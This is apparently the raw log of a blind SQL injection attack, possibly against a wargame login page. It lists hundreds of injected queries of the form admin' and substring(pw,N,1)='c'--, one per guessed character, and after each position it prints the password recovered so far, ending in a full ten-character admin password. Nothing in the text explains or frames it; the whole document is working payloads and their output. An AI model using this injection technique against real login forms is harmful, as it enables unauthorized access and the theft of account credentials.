column : 1
query : admin' and substring(pw,1,1)=' '--
query : admin' and substring(pw,1,1)='!'--
query : admin' and substring(pw,1,1)='"'--
query : admin' and substring(pw,1,1)='#'--
query : admin' and substring(pw,1,1)='$'--
query : admin' and substring(pw,1,1)='%'--
query : admin' and substring(pw,1,1)='&'--
query : admin' and substring(pw,1,1)='''--
query : admin' and substring(pw,1,1)='('--
query : admin' and substring(pw,1,1)=')'--
query : admin' and substring(pw,1,1)='*'--
query : admin' and substring(pw,1,1)='+'--
query : admin' and substring(pw,1,1)=','--
query : admin' and substring(pw,1,1)='-'--
query : admin' and substring(pw,1,1)='.'--
query : admin' and substring(pw,1,1)='/'--
query : admin' and substring(pw,1,1)='0'--
query : admin' and substring(pw,1,1)='1'--
query : admin' and substring(pw,1,1)='2'--
query : admin' and substring(pw,1,1)='3'--
query : admin' and substring(pw,1,1)='4'--
query : admin' and substring(pw,1,1)='5'--
query : admin' and substring(pw,1,1)='6'--
query : admin' and substring(pw,1,1)='7'--
query : admin' and substring(pw,1,1)='8'--
query : admin' and substring(pw,1,1)='9'--
query : admin' and substring(pw,1,1)=':'--
query : admin' and substring(pw,1,1)=';'--
query : admin' and substring(pw,1,1)='<'--
query : admin' and substring(pw,1,1)='='--
query : admin' and substring(pw,1,1)='>'--
query : admin' and substring(pw,1,1)='?'--
query : admin' and substring(pw,1,1)='@'--
query : admin' and substring(pw,1,1)='A'--
query : admin' and substring(pw,1,1)='B'--
query : admin' and substring(pw,1,1)='C'--
query : admin' and substring(pw,1,1)='D'--
query : admin' and substring(pw,1,1)='E'--
query : admin' and substring(pw,1,1)='F'--
query : admin' and substring(pw,1,1)='G'--
query : admin' and substring(pw,1,1)='H'--
query : admin' and substring(pw,1,1)='I'--
query : admin' and substring(pw,1,1)='J'--
query : admin' and substring(pw,1,1)='K'--
query : admin' and substring(pw,1,1)='L'--
query : admin' and substring(pw,1,1)='M'--
query : admin' and substring(pw,1,1)='N'--
password : N
column : 2
query : admin' and substring(pw,2,1)=' '--
query : admin' and substring(pw,2,1)='!'--
query : admin' and substring(pw,2,1)='"'--
query : admin' and substring(pw,2,1)='#'--
query : admin' and substring(pw,2,1)='$'--
query : admin' and substring(pw,2,1)='%'--
query : admin' and substring(pw,2,1)='&'--
query : admin' and substring(pw,2,1)='''--
query : admin' and substring(pw,2,1)='('--
query : admin' and substring(pw,2,1)=')'--
query : admin' and substring(pw,2,1)='*'--
query : admin' and substring(pw,2,1)='+'--
query : admin' and substring(pw,2,1)=','--
query : admin' and substring(pw,2,1)='-'--
query : admin' and substring(pw,2,1)='.'--
query : admin' and substring(pw,2,1)='/'--
query : admin' and substring(pw,2,1)='0'--
query : admin' and substring(pw,2,1)='1'--
password : N1
column : 3
query : admin' and substring(pw,3,1)=' '--
query : admin' and substring(pw,3,1)='!'--
query : admin' and substring(pw,3,1)='"'--
query : admin' and substring(pw,3,1)='#'--
query : admin' and substring(pw,3,1)='$'--
query : admin' and substring(pw,3,1)='%'--
query : admin' and substring(pw,3,1)='&'--
query : admin' and substring(pw,3,1)='''--
query : admin' and substring(pw,3,1)='('--
query : admin' and substring(pw,3,1)=')'--
query : admin' and substring(pw,3,1)='*'--
query : admin' and substring(pw,3,1)='+'--
query : admin' and substring(pw,3,1)=','--
query : admin' and substring(pw,3,1)='-'--
query : admin' and substring(pw,3,1)='.'--
query : admin' and substring(pw,3,1)='/'--
query : admin' and substring(pw,3,1)='0'--
query : admin' and substring(pw,3,1)='1'--
query : admin' and substring(pw,3,1)='2'--
query : admin' and substring(pw,3,1)='3'--
query : admin' and substring(pw,3,1)='4'--
query : admin' and substring(pw,3,1)='5'--
query : admin' and substring(pw,3,1)='6'--
query : admin' and substring(pw,3,1)='7'--
query : admin' and substring(pw,3,1)='8'--
query : admin' and substring(pw,3,1)='9'--
query : admin' and substring(pw,3,1)=':'--
query : admin' and substring(pw,3,1)=';'--
query : admin' and substring(pw,3,1)='<'--
query : admin' and substring(pw,3,1)='='--
query : admin' and substring(pw,3,1)='>'--
query : admin' and substring(pw,3,1)='?'--
query : admin' and substring(pw,3,1)='@'--
query : admin' and substring(pw,3,1)='A'--
query : admin' and substring(pw,3,1)='B'--
query : admin' and substring(pw,3,1)='C'--
query : admin' and substring(pw,3,1)='D'--
query : admin' and substring(pw,3,1)='E'--
query : admin' and substring(pw,3,1)='F'--
query : admin' and substring(pw,3,1)='G'--
query : admin' and substring(pw,3,1)='H'--
query : admin' and substring(pw,3,1)='I'--
query : admin' and substring(pw,3,1)='J'--
query : admin' and substring(pw,3,1)='K'--
query : admin' and substring(pw,3,1)='L'--
query : admin' and substring(pw,3,1)='M'--
query : admin' and substring(pw,3,1)='N'--
query : admin' and substring(pw,3,1)='O'--
query : admin' and substring(pw,3,1)='P'--
query : admin' and substring(pw,3,1)='Q'--
query : admin' and substring(pw,3,1)='R'--
query : admin' and substring(pw,3,1)='S'--
query : admin' and substring(pw,3,1)='T'--
query : admin' and substring(pw,3,1)='U'--
query : admin' and substring(pw,3,1)='V'--
query : admin' and substring(pw,3,1)='W'--
query : admin' and substring(pw,3,1)='X'--
query : admin' and substring(pw,3,1)='Y'--
query : admin' and substring(pw,3,1)='Z'--
query : admin' and substring(pw,3,1)='['--
query : admin' and substring(pw,3,1)='\'--
query : admin' and substring(pw,3,1)=']'--
query : admin' and substring(pw,3,1)='^'--
query : admin' and substring(pw,3,1)='_'--
query : admin' and substring(pw,3,1)='`'--
query : admin' and substring(pw,3,1)='a'--
query : admin' and substring(pw,3,1)='b'--
query : admin' and substring(pw,3,1)='c'--
password : N1c
column : 4
query : admin' and substring(pw,4,1)=' '--
query : admin' and substring(pw,4,1)='!'--
query : admin' and substring(pw,4,1)='"'--
query : admin' and substring(pw,4,1)='#'--
query : admin' and substring(pw,4,1)='$'--
query : admin' and substring(pw,4,1)='%'--
query : admin' and substring(pw,4,1)='&'--
query : admin' and substring(pw,4,1)='''--
query : admin' and substring(pw,4,1)='('--
query : admin' and substring(pw,4,1)=')'--
query : admin' and substring(pw,4,1)='*'--
query : admin' and substring(pw,4,1)='+'--
query : admin' and substring(pw,4,1)=','--
query : admin' and substring(pw,4,1)='-'--
query : admin' and substring(pw,4,1)='.'--
query : admin' and substring(pw,4,1)='/'--
query : admin' and substring(pw,4,1)='0'--
query : admin' and substring(pw,4,1)='1'--
query : admin' and substring(pw,4,1)='2'--
query : admin' and substring(pw,4,1)='3'--
password : N1c3
column : 5
query : admin' and substring(pw,5,1)=' '--
query : admin' and substring(pw,5,1)='!'--
query : admin' and substring(pw,5,1)='"'--
query : admin' and substring(pw,5,1)='#'--
query : admin' and substring(pw,5,1)='$'--
query : admin' and substring(pw,5,1)='%'--
query : admin' and substring(pw,5,1)='&'--
query : admin' and substring(pw,5,1)='''--
query : admin' and substring(pw,5,1)='('--
query : admin' and substring(pw,5,1)=')'--
query : admin' and substring(pw,5,1)='*'--
query : admin' and substring(pw,5,1)='+'--
query : admin' and substring(pw,5,1)=','--
query : admin' and substring(pw,5,1)='-'--
query : admin' and substring(pw,5,1)='.'--
query : admin' and substring(pw,5,1)='/'--
query : admin' and substring(pw,5,1)='0'--
query : admin' and substring(pw,5,1)='1'--
query : admin' and substring(pw,5,1)='2'--
query : admin' and substring(pw,5,1)='3'--
query : admin' and substring(pw,5,1)='4'--
query : admin' and substring(pw,5,1)='5'--
query : admin' and substring(pw,5,1)='6'--
query : admin' and substring(pw,5,1)='7'--
query : admin' and substring(pw,5,1)='8'--
query : admin' and substring(pw,5,1)='9'--
query : admin' and substring(pw,5,1)=':'--
query : admin' and substring(pw,5,1)=';'--
query : admin' and substring(pw,5,1)='<'--
query : admin' and substring(pw,5,1)='='--
query : admin' and substring(pw,5,1)='>'--
query : admin' and substring(pw,5,1)='?'--
query : admin' and substring(pw,5,1)='@'--
query : admin' and substring(pw,5,1)='A'--
query : admin' and substring(pw,5,1)='B'--
password : N1c3B
column : 6
query : admin' and substring(pw,6,1)=' '--
query : admin' and substring(pw,6,1)='!'--
query : admin' and substring(pw,6,1)='"'--
query : admin' and substring(pw,6,1)='#'--
query : admin' and substring(pw,6,1)='$'--
query : admin' and substring(pw,6,1)='%'--
query : admin' and substring(pw,6,1)='&'--
query : admin' and substring(pw,6,1)='''--
query : admin' and substring(pw,6,1)='('--
query : admin' and substring(pw,6,1)=')'--
query : admin' and substring(pw,6,1)='*'--
query : admin' and substring(pw,6,1)='+'--
query : admin' and substring(pw,6,1)=','--
query : admin' and substring(pw,6,1)='-'--
query : admin' and substring(pw,6,1)='.'--
query : admin' and substring(pw,6,1)='/'--
query : admin' and substring(pw,6,1)='0'--
query : admin' and substring(pw,6,1)='1'--
query : admin' and substring(pw,6,1)='2'--
query : admin' and substring(pw,6,1)='3'--
query : admin' and substring(pw,6,1)='4'--
query : admin' and substring(pw,6,1)='5'--
query : admin' and substring(pw,6,1)='6'--
query : admin' and substring(pw,6,1)='7'--
query : admin' and substring(pw,6,1)='8'--
query : admin' and substring(pw,6,1)='9'--
query : admin' and substring(pw,6,1)=':'--
query : admin' and substring(pw,6,1)=';'--
query : admin' and substring(pw,6,1)='<'--
query : admin' and substring(pw,6,1)='='--
query : admin' and substring(pw,6,1)='>'--
query : admin' and substring(pw,6,1)='?'--
query : admin' and substring(pw,6,1)='@'--
query : admin' and substring(pw,6,1)='A'--
query : admin' and substring(pw,6,1)='B'--
query : admin' and substring(pw,6,1)='C'--
query : admin' and substring(pw,6,1)='D'--
query : admin' and substring(pw,6,1)='E'--
query : admin' and substring(pw,6,1)='F'--
query : admin' and substring(pw,6,1)='G'--
query : admin' and substring(pw,6,1)='H'--
query : admin' and substring(pw,6,1)='I'--
query : admin' and substring(pw,6,1)='J'--
query : admin' and substring(pw,6,1)='K'--
query : admin' and substring(pw,6,1)='L'--
query : admin' and substring(pw,6,1)='M'--
query : admin' and substring(pw,6,1)='N'--
query : admin' and substring(pw,6,1)='O'--
query : admin' and substring(pw,6,1)='P'--
query : admin' and substring(pw,6,1)='Q'--
query : admin' and substring(pw,6,1)='R'--
query : admin' and substring(pw,6,1)='S'--
query : admin' and substring(pw,6,1)='T'--
query : admin' and substring(pw,6,1)='U'--
query : admin' and substring(pw,6,1)='V'--
query : admin' and substring(pw,6,1)='W'--
query : admin' and substring(pw,6,1)='X'--
query : admin' and substring(pw,6,1)='Y'--
query : admin' and substring(pw,6,1)='Z'--
query : admin' and substring(pw,6,1)='['--
query : admin' and substring(pw,6,1)='\'--
query : admin' and substring(pw,6,1)=']'--
query : admin' and substring(pw,6,1)='^'--
query : admin' and substring(pw,6,1)='_'--
query : admin' and substring(pw,6,1)='`'--
query : admin' and substring(pw,6,1)='a'--
query : admin' and substring(pw,6,1)='b'--
query : admin' and substring(pw,6,1)='c'--
query : admin' and substring(pw,6,1)='d'--
query : admin' and substring(pw,6,1)='e'--
query : admin' and substring(pw,6,1)='f'--
query : admin' and substring(pw,6,1)='g'--
query : admin' and substring(pw,6,1)='h'--
query : admin' and substring(pw,6,1)='i'--
password : N1c3Bi
column : 7
query : admin' and substring(pw,7,1)=' '--
query : admin' and substring(pw,7,1)='!'--
query : admin' and substring(pw,7,1)='"'--
query : admin' and substring(pw,7,1)='#'--
query : admin' and substring(pw,7,1)='$'--
query : admin' and substring(pw,7,1)='%'--
query : admin' and substring(pw,7,1)='&'--
query : admin' and substring(pw,7,1)='''--
query : admin' and substring(pw,7,1)='('--
query : admin' and substring(pw,7,1)=')'--
query : admin' and substring(pw,7,1)='*'--
query : admin' and substring(pw,7,1)='+'--
query : admin' and substring(pw,7,1)=','--
query : admin' and substring(pw,7,1)='-'--
query : admin' and substring(pw,7,1)='.'--
query : admin' and substring(pw,7,1)='/'--
query : admin' and substring(pw,7,1)='0'--
query : admin' and substring(pw,7,1)='1'--
query : admin' and substring(pw,7,1)='2'--
query : admin' and substring(pw,7,1)='3'--
query : admin' and substring(pw,7,1)='4'--
query : admin' and substring(pw,7,1)='5'--
query : admin' and substring(pw,7,1)='6'--
query : admin' and substring(pw,7,1)='7'--
query : admin' and substring(pw,7,1)='8'--
query : admin' and substring(pw,7,1)='9'--
query : admin' and substring(pw,7,1)=':'--
query : admin' and substring(pw,7,1)=';'--
query : admin' and substring(pw,7,1)='<'--
query : admin' and substring(pw,7,1)='='--
query : admin' and substring(pw,7,1)='>'--
query : admin' and substring(pw,7,1)='?'--
query : admin' and substring(pw,7,1)='@'--
query : admin' and substring(pw,7,1)='A'--
query : admin' and substring(pw,7,1)='B'--
query : admin' and substring(pw,7,1)='C'--
query : admin' and substring(pw,7,1)='D'--
query : admin' and substring(pw,7,1)='E'--
query : admin' and substring(pw,7,1)='F'--
query : admin' and substring(pw,7,1)='G'--
query : admin' and substring(pw,7,1)='H'--
query : admin' and substring(pw,7,1)='I'--
query : admin' and substring(pw,7,1)='J'--
query : admin' and substring(pw,7,1)='K'--
query : admin' and substring(pw,7,1)='L'--
query : admin' and substring(pw,7,1)='M'--
query : admin' and substring(pw,7,1)='N'--
query : admin' and substring(pw,7,1)='O'--
query : admin' and substring(pw,7,1)='P'--
query : admin' and substring(pw,7,1)='Q'--
query : admin' and substring(pw,7,1)='R'--
query : admin' and substring(pw,7,1)='S'--
query : admin' and substring(pw,7,1)='T'--
query : admin' and substring(pw,7,1)='U'--
query : admin' and substring(pw,7,1)='V'--
query : admin' and substring(pw,7,1)='W'--
query : admin' and substring(pw,7,1)='X'--
query : admin' and substring(pw,7,1)='Y'--
query : admin' and substring(pw,7,1)='Z'--
query : admin' and substring(pw,7,1)='['--
query : admin' and substring(pw,7,1)='\'--
query : admin' and substring(pw,7,1)=']'--
query : admin' and substring(pw,7,1)='^'--
query : admin' and substring(pw,7,1)='_'--
query : admin' and substring(pw,7,1)='`'--
query : admin' and substring(pw,7,1)='a'--
query : admin' and substring(pw,7,1)='b'--
query : admin' and substring(pw,7,1)='c'--
query : admin' and substring(pw,7,1)='d'--
query : admin' and substring(pw,7,1)='e'--
query : admin' and substring(pw,7,1)='f'--
query : admin' and substring(pw,7,1)='g'--
query : admin' and substring(pw,7,1)='h'--
query : admin' and substring(pw,7,1)='i'--
query : admin' and substring(pw,7,1)='j'--
query : admin' and substring(pw,7,1)='k'--
query : admin' and substring(pw,7,1)='l'--
password : N1c3Bil
column : 8
query : admin' and substring(pw,8,1)=' '--
query : admin' and substring(pw,8,1)='!'--
query : admin' and substring(pw,8,1)='"'--
query : admin' and substring(pw,8,1)='#'--
query : admin' and substring(pw,8,1)='$'--
query : admin' and substring(pw,8,1)='%'--
query : admin' and substring(pw,8,1)='&'--
query : admin' and substring(pw,8,1)='''--
query : admin' and substring(pw,8,1)='('--
query : admin' and substring(pw,8,1)=')'--
query : admin' and substring(pw,8,1)='*'--
query : admin' and substring(pw,8,1)='+'--
query : admin' and substring(pw,8,1)=','--
query : admin' and substring(pw,8,1)='-'--
query : admin' and substring(pw,8,1)='.'--
query : admin' and substring(pw,8,1)='/'--
query : admin' and substring(pw,8,1)='0'--
query : admin' and substring(pw,8,1)='1'--
query : admin' and substring(pw,8,1)='2'--
query : admin' and substring(pw,8,1)='3'--
query : admin' and substring(pw,8,1)='4'--
query : admin' and substring(pw,8,1)='5'--
query : admin' and substring(pw,8,1)='6'--
query : admin' and substring(pw,8,1)='7'--
query : admin' and substring(pw,8,1)='8'--
query : admin' and substring(pw,8,1)='9'--
query : admin' and substring(pw,8,1)=':'--
query : admin' and substring(pw,8,1)=';'--
query : admin' and substring(pw,8,1)='<'--
query : admin' and substring(pw,8,1)='='--
query : admin' and substring(pw,8,1)='>'--
query : admin' and substring(pw,8,1)='?'--
query : admin' and substring(pw,8,1)='@'--
query : admin' and substring(pw,8,1)='A'--
query : admin' and substring(pw,8,1)='B'--
query : admin' and substring(pw,8,1)='C'--
query : admin' and substring(pw,8,1)='D'--
query : admin' and substring(pw,8,1)='E'--
query : admin' and substring(pw,8,1)='F'--
query : admin' and substring(pw,8,1)='G'--
query : admin' and substring(pw,8,1)='H'--
query : admin' and substring(pw,8,1)='I'--
query : admin' and substring(pw,8,1)='J'--
query : admin' and substring(pw,8,1)='K'--
query : admin' and substring(pw,8,1)='L'--
query : admin' and substring(pw,8,1)='M'--
query : admin' and substring(pw,8,1)='N'--
query : admin' and substring(pw,8,1)='O'--
query : admin' and substring(pw,8,1)='P'--
query : admin' and substring(pw,8,1)='Q'--
query : admin' and substring(pw,8,1)='R'--
query : admin' and substring(pw,8,1)='S'--
query : admin' and substring(pw,8,1)='T'--
query : admin' and substring(pw,8,1)='U'--
query : admin' and substring(pw,8,1)='V'--
query : admin' and substring(pw,8,1)='W'--
query : admin' and substring(pw,8,1)='X'--
query : admin' and substring(pw,8,1)='Y'--
query : admin' and substring(pw,8,1)='Z'--
query : admin' and substring(pw,8,1)='['--
query : admin' and substring(pw,8,1)='\'--
query : admin' and substring(pw,8,1)=']'--
query : admin' and substring(pw,8,1)='^'--
query : admin' and substring(pw,8,1)='_'--
query : admin' and substring(pw,8,1)='`'--
query : admin' and substring(pw,8,1)='a'--
query : admin' and substring(pw,8,1)='b'--
query : admin' and substring(pw,8,1)='c'--
query : admin' and substring(pw,8,1)='d'--
query : admin' and substring(pw,8,1)='e'--
query : admin' and substring(pw,8,1)='f'--
query : admin' and substring(pw,8,1)='g'--
query : admin' and substring(pw,8,1)='h'--
query : admin' and substring(pw,8,1)='i'--
query : admin' and substring(pw,8,1)='j'--
query : admin' and substring(pw,8,1)='k'--
query : admin' and substring(pw,8,1)='l'--
query : admin' and substring(pw,8,1)='m'--
query : admin' and substring(pw,8,1)='n'--
password : N1c3Biln
column : 9
query : admin' and substring(pw,9,1)=' '--
query : admin' and substring(pw,9,1)='!'--
query : admin' and substring(pw,9,1)='"'--
query : admin' and substring(pw,9,1)='#'--
query : admin' and substring(pw,9,1)='$'--
query : admin' and substring(pw,9,1)='%'--
query : admin' and substring(pw,9,1)='&'--
query : admin' and substring(pw,9,1)='''--
query : admin' and substring(pw,9,1)='('--
query : admin' and substring(pw,9,1)=')'--
query : admin' and substring(pw,9,1)='*'--
query : admin' and substring(pw,9,1)='+'--
query : admin' and substring(pw,9,1)=','--
query : admin' and substring(pw,9,1)='-'--
query : admin' and substring(pw,9,1)='.'--
query : admin' and substring(pw,9,1)='/'--
query : admin' and substring(pw,9,1)='0'--
query : admin' and substring(pw,9,1)='1'--
query : admin' and substring(pw,9,1)='2'--
query : admin' and substring(pw,9,1)='3'--
query : admin' and substring(pw,9,1)='4'--
query : admin' and substring(pw,9,1)='5'--
query : admin' and substring(pw,9,1)='6'--
query : admin' and substring(pw,9,1)='7'--
query : admin' and substring(pw,9,1)='8'--
query : admin' and substring(pw,9,1)='9'--
query : admin' and substring(pw,9,1)=':'--
query : admin' and substring(pw,9,1)=';'--
query : admin' and substring(pw,9,1)='<'--
query : admin' and substring(pw,9,1)='='--
query : admin' and substring(pw,9,1)='>'--
query : admin' and substring(pw,9,1)='?'--
query : admin' and substring(pw,9,1)='@'--
query : admin' and substring(pw,9,1)='A'--
query : admin' and substring(pw,9,1)='B'--
query : admin' and substring(pw,9,1)='C'--
query : admin' and substring(pw,9,1)='D'--
query : admin' and substring(pw,9,1)='E'--
query : admin' and substring(pw,9,1)='F'--
query : admin' and substring(pw,9,1)='G'--
query : admin' and substring(pw,9,1)='H'--
query : admin' and substring(pw,9,1)='I'--
query : admin' and substring(pw,9,1)='J'--
query : admin' and substring(pw,9,1)='K'--
query : admin' and substring(pw,9,1)='L'--
query : admin' and substring(pw,9,1)='M'--
query : admin' and substring(pw,9,1)='N'--
query : admin' and substring(pw,9,1)='O'--
query : admin' and substring(pw,9,1)='P'--
query : admin' and substring(pw,9,1)='Q'--
query : admin' and substring(pw,9,1)='R'--
query : admin' and substring(pw,9,1)='S'--
query : admin' and substring(pw,9,1)='T'--
query : admin' and substring(pw,9,1)='U'--
query : admin' and substring(pw,9,1)='V'--
query : admin' and substring(pw,9,1)='W'--
query : admin' and substring(pw,9,1)='X'--
query : admin' and substring(pw,9,1)='Y'--
query : admin' and substring(pw,9,1)='Z'--
query : admin' and substring(pw,9,1)='['--
query : admin' and substring(pw,9,1)='\'--
query : admin' and substring(pw,9,1)=']'--
query : admin' and substring(pw,9,1)='^'--
query : admin' and substring(pw,9,1)='_'--
query : admin' and substring(pw,9,1)='`'--
query : admin' and substring(pw,9,1)='a'--
query : admin' and substring(pw,9,1)='b'--
query : admin' and substring(pw,9,1)='c'--
query : admin' and substring(pw,9,1)='d'--
query : admin' and substring(pw,9,1)='e'--
query : admin' and substring(pw,9,1)='f'--
query : admin' and substring(pw,9,1)='g'--
query : admin' and substring(pw,9,1)='h'--
query : admin' and substring(pw,9,1)='i'--
query : admin' and substring(pw,9,1)='j'--
query : admin' and substring(pw,9,1)='k'--
query : admin' and substring(pw,9,1)='l'--
password : N1c3Bilnl
column : 10
query : admin' and substring(pw,10,1)=' '--
query : admin' and substring(pw,10,1)='!'--
query : admin' and substring(pw,10,1)='"'--
query : admin' and substring(pw,10,1)='#'--
query : admin' and substring(pw,10,1)='$'--
query : admin' and substring(pw,10,1)='%'--
query : admin' and substring(pw,10,1)='&'--
query : admin' and substring(pw,10,1)='''--
query : admin' and substring(pw,10,1)='('--
query : admin' and substring(pw,10,1)=')'--
password : N1c3Bilnl)
